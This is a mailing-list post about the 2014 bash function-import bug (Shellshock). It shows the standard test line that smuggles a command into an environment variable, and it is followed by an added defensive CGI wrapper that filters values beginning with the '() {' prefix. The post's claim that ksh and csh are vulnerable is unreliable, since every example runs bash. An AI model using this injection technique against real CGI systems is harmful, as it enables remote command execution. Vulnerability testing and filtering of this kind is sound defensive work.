Hello list,

The bug in the bash shell discovered yesterday also seems to be present in ksh and
csh. ksh is known to be the default shell in OpenBSD.

The following piece of shell code executes successfully on both ksh and csh
(besides bash of course):
ksh:
$ env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test

csh:
%  env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test


bash:
$ env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test

All platforms seem to be affected: 5.2, 5.3, 5.4, 5.5 - amd64


I wonder what is to be done to circumvent any potential security risk for
people who call shell script code from CGI scripts, for example.


Cheers,

/Bogdan
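
An added example, not part of the original message, for the closing question about CGI scripts: a wrapper that starts the shell script with an emptied environment and passes on only allowlisted CGI variables whose values do not begin with the `() {` prefix used in the test string above. The allowlist, the fixed PATH and the function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. All names below are hypothetical.

# Variables the CGI handler is assumed to need (assumption: adjust per application).
CGI_ALLOW="REQUEST_METHOD QUERY_STRING CONTENT_TYPE CONTENT_LENGTH HTTP_USER_AGENT HTTP_COOKIE REMOTE_ADDR"

# Succeeds when a value starts with "() {", the prefix the test string in the
# post relies on to be imported as a function definition.
looks_like_funcdef() {
    case $1 in
        '() {'*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Prints the allowlisted variable names whose current value would be dropped.
rejected_vars() {
    for name in $CGI_ALLOW; do
        eval "val=\${$name-}"      # name comes from the fixed allowlist only
        if looks_like_funcdef "$val"; then printf '%s\n' "$name"; fi
    done
}

# Runs "$@" under env -i: nothing is inherited except a fixed PATH and the
# allowlisted variables that are set and pass the prefix check.
run_scrubbed() (
    ncmd=$#
    for name in $CGI_ALLOW; do
        eval "isset=\${$name+x}; val=\${$name-}"
        [ -n "$isset" ] || continue
        if looks_like_funcdef "$val"; then
            echo "dropped $name: function-definition prefix" >&2
            continue
        fi
        set -- "$@" "$name=$val"
    done
    # Rotate the command words behind the NAME=value words for env(1).
    i=0
    while [ "$i" -lt "$ncmd" ]; do
        set -- "$@" "$1"; shift; i=$((i + 1))
    done
    exec env -i PATH=/usr/bin:/bin "$@"
)
```

A CGI entry point would call `run_scrubbed /path/to/handler.sh` instead of invoking the handler directly; dropped variables are reported on stderr so they show up in the web server's error log.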
